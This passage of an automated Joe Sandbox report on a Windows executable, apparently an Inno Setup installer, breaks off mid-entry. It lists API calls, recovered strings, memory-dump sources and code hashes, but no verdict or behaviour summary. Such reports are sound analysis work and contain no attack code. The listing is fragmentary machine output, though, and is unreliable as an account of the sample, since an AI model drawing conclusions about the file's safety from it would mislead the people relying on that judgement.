                                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 00472DB8
                                                                            • GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00472EAF,00494F8C,00000000), ref: 00472DCB
                                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00472DD1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AddressHandleModuleProcProcessThreadWindow
                                                                            • String ID: AllowSetForegroundWindow$user32.dll
                                                                            • API String ID: 1782028327-3855017861
                                                                            • Opcode ID: c43b6504bda33aa8a25e434dc5dae65070d08f477b8a573627ea55408e2f79eb
                                                                            • Instruction ID: 0d6554dd73869eefd80f1f1d64911f0ce37f8ea1c6ebe10b7f66a80c05d08a0e
                                                                            • Opcode Fuzzy Hash: c43b6504bda33aa8a25e434dc5dae65070d08f477b8a573627ea55408e2f79eb
                                                                            • Instruction Fuzzy Hash: C7D0C7A16057016AD97077F5CE47DDF229CCD84755B14C43F7408F6186DABCE801997D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • BeginPaint.USER32(00000000,?), ref: 00416BC2
                                                                            • SaveDC.GDI32(?), ref: 00416BF3
                                                                            • ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000,00416CB5), ref: 00416C54
                                                                            • RestoreDC.GDI32(?,?), ref: 00416C7B
                                                                            • EndPaint.USER32(00000000,?,00416CBC,00000000,00416CB5), ref: 00416CAF
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                                            • String ID:
                                                                            • API String ID: 3808407030-0
                                                                            • Opcode ID: c06abe95da4831753d63b9634986ca39a884699dacb8f14d7531f4240f3d7fe3
                                                                            • Instruction ID: 41fb8ea60d97978a9acdf236596d3a8a0d8a1996066437b2b943a95edf1585a8
                                                                            • Opcode Fuzzy Hash: c06abe95da4831753d63b9634986ca39a884699dacb8f14d7531f4240f3d7fe3
                                                                            • Instruction Fuzzy Hash: BF414E70A042049FDB14DB99C989FAA77F9EB48304F1580AEE4459B362D778DD40CB58
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 50d6a748b1b1338860e82f27f8761871ff193d734180217a0f8d82b491afa6e7
                                                                            • Instruction ID: 41a7722d09b35ce9ade17cd18fdec9692d257bae8bd1aa266952c484067d5cda
                                                                            • Opcode Fuzzy Hash: 50d6a748b1b1338860e82f27f8761871ff193d734180217a0f8d82b491afa6e7
                                                                            • Instruction Fuzzy Hash: D3311F746047409FC320EB69C584BABB7E8AF89714F04991EF9E5C7791D738EC818B19
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429778
                                                                            • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 004297A7
                                                                            • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 004297C3
                                                                            • SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 004297EE
                                                                            • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 0042980C
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3850602802-0
                                                                            • Opcode ID: fe9210cf49636514123fe8028928f87ce2f158866a525e02be5b173165c2f537
                                                                            • Instruction ID: 5c059f72bad19c8464015bcf3ba3f3fa2ba546ca9f5ab3c2e37583cf1b766786
                                                                            • Opcode Fuzzy Hash: fe9210cf49636514123fe8028928f87ce2f158866a525e02be5b173165c2f537
                                                                            • Instruction Fuzzy Hash: 2E217F70710714BAE710ABA6DC82F5B77ACEB46708F90443EB501BB3D2DB78AD41865C
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetSystemMetrics.USER32(0000000B), ref: 0041BB3A
                                                                            • GetSystemMetrics.USER32(0000000C), ref: 0041BB44
                                                                            • 73A0A570.USER32(00000000,00000001,0000000C,0000000B,?,?), ref: 0041BB82
                                                                            • 73A16310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BCED,?,00000000,00000001,0000000C,0000000B,?,?), ref: 0041BBC9
                                                                            • DeleteObject.GDI32(00000000), ref: 0041BC0A
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: MetricsSystem$A16310A570DeleteObject
                                                                            • String ID:
                                                                            • API String ID: 2246927583-0
                                                                            • Opcode ID: cb0e2adf6529593e89f90c831e9305c3e05f521d232314fc64d16b3fc11dbc77
                                                                            • Instruction ID: e64c8cfb77975bfe1c5019289902123c5e37d94f13133d85ba8c481b6df62587
                                                                            • Opcode Fuzzy Hash: cb0e2adf6529593e89f90c831e9305c3e05f521d232314fc64d16b3fc11dbc77
                                                                            • Instruction Fuzzy Hash: 91316F74E00609EFDB00DFA5C941AAEB7F4EB48700F10846AF510AB781D7389E80DB98
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 0045B370: SetLastError.KERNEL32(00000057,00000000,0045B43C,?,?,?,?,00000000), ref: 0045B3DB
                                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,0046EED0,?,?,00000001,004950AC), ref: 0046EE89
                                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,0046EED0,?,?,00000001,004950AC), ref: 0046EE9F
                                                                            Strings
                                                                            • Failed to set permissions on registry key (%d)., xrefs: 0046EEB0
                                                                            • Could not set permissions on the registry key because it currently does not exist., xrefs: 0046EE93
                                                                            • Setting permissions on registry key: %s\%s, xrefs: 0046EE4E
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast
                                                                            • String ID: Could not set permissions on the registry key because it currently does not exist.$Failed to set permissions on registry key (%d).$Setting permissions on registry key: %s\%s
                                                                            • API String ID: 1452528299-4018462623
                                                                            • Opcode ID: 55a67c74d7be1f49e0db02a0eeb01d23dee57b17d7fb2968d2e0597982d68bfc
                                                                            • Instruction ID: df05376805d2ea433cd9e8d9b9222adeaa9c52dcffddc60509e69f4445759fc8
                                                                            • Opcode Fuzzy Hash: 55a67c74d7be1f49e0db02a0eeb01d23dee57b17d7fb2968d2e0597982d68bfc
                                                                            • Instruction Fuzzy Hash: 4621F534A046445FCF00DBAAC8816AEBBF5DB49314F50417BF404E7392E7795D058B6E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                            • SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403CFC
                                                                            • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403D06
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403D15
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide$AllocString
                                                                            • String ID:
                                                                            • API String ID: 262959230-0
                                                                            • Opcode ID: bbd83879051bbb61c82a419d540aea94b1d83442c47b8cdfd9cb13069dd9a881
                                                                            • Instruction ID: 657f84db466bd1c54801a2b30447fc2084338491f8142acf58a262d5883cef98
                                                                            • Opcode Fuzzy Hash: bbd83879051bbb61c82a419d540aea94b1d83442c47b8cdfd9cb13069dd9a881
                                                                            • Instruction Fuzzy Hash: FCF0A4917442043BF21025A65C43F6B198CCB82B9BF50053FB704FA1D2D87C9D04427D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

APIs
• 73A08830.GDI32(00000000,00000000,00000000), ref: 00414389
• 73A022A0.GDI32(00000000,00000000,00000000,00000000), ref: 00414391
• 73A08830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 004143A5
• 73A022A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 004143AB
• 73A0A480.USER32(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 004143B6
Memory Dump Source
• Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_file.jbxd
Similarity
• API ID: A022A08830$A480
• String ID:
• API String ID: 3036329673-0
• Opcode ID: 194e3fff164acdd9274630c615ac113e6c237e1a8584744cad8ee02aea33715e
• Instruction ID: 94861c3129a932f854b236b0087f7367a4de39103189020794ca85cb03cdcc47
• Opcode Fuzzy Hash: 194e3fff164acdd9274630c615ac113e6c237e1a8584744cad8ee02aea33715e
• Instruction Fuzzy Hash: 6F01DF7121C3806AD200B63E8C85A9F6BED8FCA314F15556EF498DB382CA7ACC018765
Uniqueness
• Uniqueness Score: -1.00%

APIs
• RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000,00476895,?,00000000,00000000,00000001,00000000,00475339,?,00000000), ref: 004752FD
Strings
• Cannot access a 64-bit key in a "reg" constant on this version of Windows, xrefs: 00475171
• Failed to parse "reg" constant, xrefs: 00475304
• XPG, xrefs: 00475196
Memory Dump Source
• Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_file.jbxd
Similarity
• API ID: Close
• String ID: Cannot access a 64-bit key in a "reg" constant on this version of Windows$Failed to parse "reg" constant$XPG
• API String ID: 3535843008-221462518
• Opcode ID: 2ad844ec3d3387f5df215a59a8183cae574ced7ce954c6da98f45587ceaedfea
• Instruction ID: efa73f53bf694626ca38b284cffe8b81a50960838d42bcbe4388b938de67f833
• Opcode Fuzzy Hash: 2ad844ec3d3387f5df215a59a8183cae574ced7ce954c6da98f45587ceaedfea
• Instruction Fuzzy Hash: 2C814174E00548AFCB10EF95C881ADEBBF9AF44355F50816AE814FB391D778AE05CB98
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0041EFE4: GetActiveWindow.USER32 ref: 0041EFE7
  • Part of subcall function 0041EFE4: GetCurrentThreadId.KERNEL32 ref: 0041EFFC
  • Part of subcall function 0041EFE4: 73A15940.USER32(00000000,Function_0001EFC0), ref: 0041F002
  • Part of subcall function 00423118: GetSystemMetrics.USER32(00000000), ref: 0042311A
• OffsetRect.USER32(?,?,?), ref: 00424D39
• DrawTextA.USER32(00000000,00000000,000000FF,?,00000C10), ref: 00424DFC
• OffsetRect.USER32(?,?,?), ref: 00424E0D
  • Part of subcall function 004234D4: GetCurrentThreadId.KERNEL32 ref: 004234E9
  • Part of subcall function 004234D4: SetWindowsHookExA.USER32(00000003,00423490,00000000,00000000), ref: 004234F9
  • Part of subcall function 004234D4: CreateThread.KERNEL32(00000000,000003E8,00423440,00000000,00000000), ref: 0042351D
  • Part of subcall function 00424A9C: SetTimer.USER32(00000000,00000001,?,00423424), ref: 00424AB7
Strings
Memory Dump Source
• Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_file.jbxd
Similarity
• API ID: Thread$CurrentOffsetRect$A15940ActiveCreateDrawHookMetricsSystemTextTimerWindowWindows
• String ID: KB
• API String ID: 4121718042-1869488878
• Opcode ID: ba4daf257325cbcca7612a03de97b8ebc6b1ca257ff465a9f0c405e7408712a1
• Instruction ID: ae1ca80dbbb80d562d58c988e2a096fec0eb4d76cb14d5a08aa48516f4e8acc9
• Opcode Fuzzy Hash: ba4daf257325cbcca7612a03de97b8ebc6b1ca257ff465a9f0c405e7408712a1
• Instruction Fuzzy Hash: 89811771A002189FDB14DFA8D884ADEBBB5FF48314F5045AAE904AB296DB38AD45CF44
Uniqueness
• Uniqueness Score: -1.00%

APIs
• WNetGetUniversalNameA.MPR(00000000,00000001,?,00000400), ref: 00406F6B
• WNetOpenEnumA.MPR(00000001,00000001,00000000,00000000,?), ref: 00406FE5
• WNetEnumResourceA.MPR(?,FFFFFFFF,?,?), ref: 0040703D
Strings
Memory Dump Source
• Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_file.jbxd
Similarity
• API ID: Enum$NameOpenResourceUniversal
• String ID: Z
• API String ID: 3604996873-1505515367
• Opcode ID: 3e23b715a30e1b5c3429261b8d124dbcf9289215ab71e09fab44fa3001b00485
• Instruction ID: 7c0b9131d06079f5eec8a494c30c5fea0581ab0ea086ea85159b160c15df41a2
• Opcode Fuzzy Hash: 3e23b715a30e1b5c3429261b8d124dbcf9289215ab71e09fab44fa3001b00485
• Instruction Fuzzy Hash: FB514170E042099FDB11EF55C941A9EBBB9FB09304F5041BAE540BB3D1C778AE418F5A
Uniqueness
• Uniqueness Score: -1.00%

APIs
• SetRectEmpty.USER32(?), ref: 0044C8E2
• DrawTextA.USER32(00000000,00000000,00000000,?,00000D20), ref: 0044C90D
• DrawTextA.USER32(00000000,00000000,00000000,00000000,00000800), ref: 0044C995
Strings
Memory Dump Source
• Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_file.jbxd
Similarity
• API ID: DrawText$EmptyRect
• String ID:
• API String ID: 182455014-2867612384
• Opcode ID: d0c3e2c7287d8feafc52a027ec46cb3325a20517415fc8e523dc578fc7dbd799
• Instruction ID: 131ceb366f2beb704c5e67361b9b215d261598caf296ae96956cdec3368353cb
• Opcode Fuzzy Hash: d0c3e2c7287d8feafc52a027ec46cb3325a20517415fc8e523dc578fc7dbd799
• Instruction Fuzzy Hash: 8F5172B1900248AFDB50DFA9C885BDEBBF9FF48314F08447AE845EB252D7389944CB64
Uniqueness
• Uniqueness Score: -1.00%

APIs
• 73A0A570.USER32(00000000,00000000,0042EA1C,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0042E8F2
  • Part of subcall function 0041A158: CreateFontIndirectA.GDI32(?), ref: 0041A217
• SelectObject.GDI32(?,00000000), ref: 0042E915
• 73A0A480.USER32(00000000,?,0042EA01,00000000,0042E9FA,?,00000000,00000000,0042EA1C,?,?,?,?,00000000,00000000,00000000), ref: 0042E9F4
Strings
Memory Dump Source
• Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_file.jbxd
Similarity
• API ID: A480A570CreateFontIndirectObjectSelect
• String ID: ...\
• API String ID: 2998766281-983595016
• Opcode ID: 9df2e027a5ad20ed6d7352ee69e297a86736b9e25cbcddb4c0eeddf445b1d3af
• Instruction ID: 308711b3510e2d142e5f8917cb1a7286c815dd25c3ebae82bdfc5a56718784f8
• Opcode Fuzzy Hash: 9df2e027a5ad20ed6d7352ee69e297a86736b9e25cbcddb4c0eeddf445b1d3af
• Instruction Fuzzy Hash: 79315070B00129ABDF11EB9AD841BAEB7B8FF49304F90447BF410A7291D7789E41CA69
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0047DDF7,?,00000001,?,?,0047DDF7,?,00000001,00000000), ref: 0042DC70
• RegCloseKey.ADVAPI32(?,0048CF6A,?,?,00000001,00000000,00000000,0048CF85), ref: 0048CF53
Strings
• %s\%s_is1, xrefs: 0048CEE4
• Inno Setup CodeFile: , xrefs: 0048CF16
• Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0048CEC6
Memory Dump Source
• Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_file.jbxd
Similarity
• API ID: CloseOpen
• String ID: %s\%s_is1$Inno Setup CodeFile: $Software\Microsoft\Windows\CurrentVersion\Uninstall
• API String ID: 47109696-1837835967
• Opcode ID: a5317e2cdf1504813c9fe7444e3c67d1a119a8e89a958819ee54ab3caef088f8
• Instruction ID: 9198a2c89c650ecdb9ea5b928749e7ef7688678c62cd245957542d324bac4bf5
• Opcode Fuzzy Hash: a5317e2cdf1504813c9fe7444e3c67d1a119a8e89a958819ee54ab3caef088f8
• Instruction Fuzzy Hash: 9B316374A042045FDB01EFA5DC91A9EBBF9EB4C704F50447BE604E7391D7789A058B68
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetClassInfoA.USER32(00400000,?,?), ref: 004163EF
• UnregisterClassA.USER32(?,00400000), ref: 0041641B
• RegisterClassA.USER32(?), ref: 0041643E
Strings
Memory Dump Source
• Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_file.jbxd
Similarity
• API ID: Class$InfoRegisterUnregister
• String ID: @
• API String ID: 3749476976-2766056989
• Opcode ID: 5b73e54eb71c748753e3b8d1054902b7c0852253915f9ea95734fd2023c17c48
• Instruction ID: 182fc5ce89434e719f204c44de6314d23bdba4c1adcba5a9141eaa64fba15999
• Opcode Fuzzy Hash: 5b73e54eb71c748753e3b8d1054902b7c0852253915f9ea95734fd2023c17c48
• Instruction Fuzzy Hash: F4318E702042008BD760EF68C881B9B77E5AB88308F00447FFA85CB392DB39D9448B6E
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetFileAttributesA.KERNEL32(00000000,004928F5,00000000,0049211E,?,?,00000000,00494628), ref: 00492098
• SetFileAttributesA.KERNEL32(00000000,00000000,00000000,004928F5,00000000,0049211E,?,?,00000000,00494628), ref: 004920C1
• MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 004920DA
Strings
Memory Dump Source
• Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_file.jbxd
Similarity
• API ID: File$Attributes$Move
• String ID: isRS-%.3u.tmp
• API String ID: 3839737484-3657609586
• Opcode ID: bf2922b1aaa6c30ca688b35688b4cf24069c5c6910dd478e72a2b9c309e37070
• Instruction ID: b810cc2a7e5d2205544a106a5c70962c88f81ee0cc3f37104223c1277275e24c
• Opcode Fuzzy Hash: bf2922b1aaa6c30ca688b35688b4cf24069c5c6910dd478e72a2b9c309e37070
• Instruction Fuzzy Hash: 92216470D00219BFDF14EFA9C9829AFBBB9EB54314F10453AB814B72D1D6785E018A59
Uniqueness
• Uniqueness Score: -1.00%

APIs
• MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404DC5
• ExitProcess.KERNEL32 ref: 00404E0D
Strings
Memory Dump Source
• Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_file.jbxd
Similarity
• API ID: ExitMessageProcess
• String ID: Error$Runtime error at 00000000
• API String ID: 1220098344-2970929446
• Opcode ID: a06c2f23053dee05738a3b3847c410c2c592315d1a0ade8e47e6ee14016d8d79
• Instruction ID: 4d0016c8d5fe4094e25e5fe0be570a8f0713ad45d294035ab8c8bb1c6a4e5ebc
• Opcode Fuzzy Hash: a06c2f23053dee05738a3b3847c410c2c592315d1a0ade8e47e6ee14016d8d79
• Instruction Fuzzy Hash: 7421B360A442418ADB21AB75EC81F163BD197EA349F04817BE700B77E6C67C894687AE
Uniqueness
• Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 0042C6E0: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C704
                                                                              • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                              • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                            • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00454CB0
                                                                            • RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 00454CDD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Type$AllocByteCharFullLoadMultiNamePathRegisterStringWide
                                                                            • String ID: LoadTypeLib$RegisterTypeLib
                                                                            • API String ID: 1312246647-2435364021
                                                                            • Opcode ID: f61e69b483cb001645570106c37636ac553a9824954e6e8b6d66c00c2f183d59
                                                                            • Instruction ID: d9fba730cb80c63aa19026fdd437f4fece929029815e2f29f966a9b9864a7c3d
                                                                            • Opcode Fuzzy Hash: f61e69b483cb001645570106c37636ac553a9824954e6e8b6d66c00c2f183d59
                                                                            • Instruction Fuzzy Hash: C411B430A00604AFDB11DFA6DC51A5EB7BDEBC9709B108476FD04D7651DA389D48C614
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 00424234: SetWindowTextA.USER32(?,00000000), ref: 0042424C
                                                                            • GetFocus.USER32 ref: 004736A7
                                                                            • GetKeyState.USER32(0000007A), ref: 004736B9
                                                                            • WaitMessage.USER32(?,00000000,004736E0,?,00000000,00473707,?,?,00000001,00000000,?,?,?,?,0047AADF,00000000), ref: 004736C3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
